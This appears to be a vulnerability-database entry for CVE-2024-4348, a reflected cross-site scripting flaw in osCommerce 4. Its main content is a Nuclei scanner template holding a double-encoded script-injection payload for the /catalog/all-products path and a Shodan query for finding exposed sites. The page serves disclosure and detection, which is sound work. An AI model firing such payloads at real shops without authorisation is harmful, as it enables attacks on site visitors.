CVE-2024-4348: osCommerce v4.0 - Cross-site Scripting

日期: 2025-08-01 | 影响软件: osCommerce | POC: 已公开

漏洞描述

A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.

PoC代码[已公开]

id: CVE-2024-4348

info:
  name: osCommerce v4.0 - Cross-site Scripting
  author: s4e-io
  severity: medium
  description: |
    A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.
  reference:
    - https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4348
    - https://vuldb.com/?ctiid.262488
    - https://vuldb.com/?id.262488
    - https://vuldb.com/?submit.320855
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-4348
    cwe-id: CWE-79
    epss-score: 0.13138
    epss-percentile: 0.93889
    cpe: cpe:2.3:a:oscommerce:oscommerce:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"osCommerce"
    product: oscommerce
    vendor: oscommerce
  tags: packetstorm,xss,rxss,oscommerce,cve2024,cve

http:
  - method: GET
    path:
      - "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
      - "{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt>alert('document_domain')</ScRiPt>"
          - "Listing of all products on the site"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f719319708be52ddb0bf708dd03379c0855009dea19c4bd352c6a552178405450220343f1c3ae1e1e307755fc4f3c3fac11765b6e478608a4501d74de7d7d4d7d918:922c64590222798bb761d5b6d8e72950

相关漏洞推荐